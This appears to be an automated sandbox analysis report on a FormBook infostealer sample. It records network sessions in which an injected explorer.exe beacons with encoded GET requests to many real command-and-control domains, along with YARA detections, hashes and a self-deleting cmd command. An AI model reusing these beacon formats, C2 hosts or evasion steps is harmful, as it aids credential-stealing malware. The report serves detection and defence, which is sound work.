                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-s


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49692 | 107.180.50.167 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:03:24.777910948 CEST | 145 | OUT | GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== HTTP/1.1
Host: www.alliedcds.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:03:24.929091930 CEST | 145 | IN | HTTP/1.1 302 Found
                                                                          Date: Mon, 12 Apr 2021 08:03:24 GMT
                                                                          Server: Apache
                                                                          Location: https://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==
                                                                          Content-Length: 319
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6c 6c 69 65 64 63 64 73 2e 63 6f 6d 2f 68 78 33 61 2f 3f 36 6c 3d 74 38 65 54 7a 66 41 38 72 42 37 70 79 26 61 6d 70 3b 79 76 4c 70 36 3d 33 42 6f 6e 49 54 59 64 78 4d 6e 30 67 4c 4d 2b 57 45 4c 56 59 67 6e 53 70 2b 71 59 61 36 6e 31 39 48 67 59 55 48 35 30 6f 7a 55 77 30 34 47 4c 44 6d 2b 62 6a 70 62 64 44 34 34 2f 6b 76 6b 58 6c 44 74 75 41 55 4d 4d 73 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&amp;yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49712 | 118.27.95.215 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:04:30.239696026 CEST | 263 | OUT | GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== HTTP/1.1
Host: www.yakudatsu-hikaku.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:04:30.539264917 CEST | 264 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Mon, 12 Apr 2021 08:04:30 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: close
                                                                          Location: https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g==
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49695 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:03:40.254791975 CEST | 172 | OUT | GET /hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py HTTP/1.1
Host: www.investmentpartners.limited
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:03:40.456928968 CEST | 173 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 12 Apr 2021 08:03:40 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6073fe55-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49697 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:03:45.624224901 CEST | 184 | OUT | GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== HTTP/1.1
Host: www.stacksyspro.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:03:45.825258970 CEST | 185 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 12 Apr 2021 08:03:45 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6073fe55-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49698 | Destination IP: 103.86.176.10 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Apr 12, 2021 10:03:51.573878050 CEST | kBytes transferred: 186 | Direction: OUT | Data: GET /hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.aksharnewtown.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Apr 12, 2021 10:03:51.744096041 CEST | kBytes transferred: 186 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Location: https://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py
                                                                          Server: Microsoft-IIS/10.0
                                                                          X-Powered-By: ASP.NET
                                                                          X-Powered-By-Plesk: PleskWin
                                                                          Date: Mon, 12 Apr 2021 08:03:50 GMT
                                                                          Connection: close
                                                                          Content-Length: 262
                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&amp;6l=t8eTzfA8rB7py">here</a></body>


                                                                          Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49702 | Destination IP: 163.44.185.226 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Apr 12, 2021 10:03:57.387516975 CEST | kBytes transferred: 196 | Direction: OUT | Data: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== HTTP/1.1
                                                                          Host: www.tonton-koubou.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Apr 12, 2021 10:03:57.865974903 CEST | kBytes transferred: 197 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 12 Apr 2021 08:03:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.12
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-Redirect-By: WordPress
                                                                          Location: http://tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA==
                                                                          X-Cache: MISS


                                                                          Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49703 | Destination IP: 91.236.136.12 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Apr 12, 2021 10:04:03.143248081 CEST | kBytes transferred: 198 | Direction: OUT | Data: GET /hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.formula-kuhni.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Apr 12, 2021 10:04:03.245630026 CEST | kBytes transferred: 198 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 12 Apr 2021 08:04:03 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Content-Length: 19
                                                                          Connection: close
                                                                          Data Raw: 34 30 34 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: 404 File not found.


                                                                          Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49706 | Destination IP: 81.17.18.198 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Apr 12, 2021 10:04:13.810667038 CEST | kBytes transferred: 222 | Direction: OUT | Data: GET /hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.xn--ol-xia.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Apr 12, 2021 10:04:13.872195959 CEST | kBytes transferred: 223 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                          cache-control: max-age=0, private, must-revalidate
                                                                          connection: close
                                                                          content-length: 583
                                                                          content-type: text/html; charset=utf-8
                                                                          date: Mon, 12 Apr 2021 08:04:13 GMT
                                                                          server: nginx
                                                                          set-cookie: sid=aba351c6-9b65-11eb-9d74-2dd539372245; path=/; domain=.xn--ol-xia.com; expires=Sat, 30 Apr 2089 11:18:20 GMT; max-age=2147483647; HttpOnly
                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.xn--ol-xia.com/hx3a/?6l=t8eTzfA8rB7py&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIyMTg1MywiaWF0IjoxNjE4MjE0NjUzLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFncjlyZHEwNXYyNjc4ZzQxMWs5cWEiLCJuYmYiOjE2MTgyMTQ2NTMsInRzIjoxNjE4MjE0NjUzODYyNTM5fQ.5PL6-1ijfh9a57Idr9B8HV8Sxkzo2Wp4FdlOKgOs6nA&sid=aba351c6-9b65-11eb-9d74-2dd539372245&yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ%3D%3D');</script></body></html>


                                                                          Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 49708 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Apr 12, 2021 10:04:19.133089066 CEST | kBytes transferred: 236 | Direction: OUT | Data: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== HTTP/1.1
                                                                          Host: www.ugonget.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Apr 12, 2021 10:04:19.335300922 CEST | kBytes transferred: 237 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 12 Apr 2021 08:04:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "60737936-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 49709 | Destination IP: 104.21.37.16 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Apr 12, 2021 10:04:24.470243931 CEST | kBytes transferred: 237 | Direction: OUT | Data: GET /hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.jabberjawmobile.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Apr 12, 2021 10:04:24.554410934 CEST | kBytes transferred: 238 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                          Date: Mon, 12 Apr 2021 08:04:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: __cfduid=daaf5a24835a7e9f50c170a78d80a16e01618214664; expires=Wed, 12-May-21 08:04:24 GMT; path=/; domain=.jabberjawmobile.com; HttpOnly; SameSite=Lax
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0966b5513c00006b958d83a000000001
                                                                          Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zVt%2FYAlPkl7zivBGWfRUYg%2FhAZg%2BCy%2F7q2LhbRTtG6H1n5z7CU299XLicxON7g6PZ4idKZDwFV2Z2nklvpYQxQzvzitQDQJzSzEGTjUncyu21bFFSJvbXg%3D%3D"}]}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 63eaf1952c266b95-LHR
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          System Behavior

                                                                          General

                                                                          Start time:10:02:28
                                                                          Start date:12/04/2021
                                                                          Path:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\4oItdZkNOZ.exe'
                                                                          Imagebase:0x400000
                                                                          File size:394513 bytes
                                                                          MD5 hash:36CF33E57CCCCF3754B57AB14E623E57
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:10:02:29
                                                                          Start date:12/04/2021
                                                                          Path:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\4oItdZkNOZ.exe'
                                                                          Imagebase:0x400000
                                                                          File size:394513 bytes
                                                                          MD5 hash:36CF33E57CCCCF3754B57AB14E623E57
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:10:02:34
                                                                          Start date:12/04/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:
                                                                          Imagebase:0x7ff6f22f0000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:10:02:48
                                                                          Start date:12/04/2021
                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                          Imagebase:0x240000
                                                                          File size:143360 bytes
                                                                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 10:02:52
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:02:53
Start date: 12/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

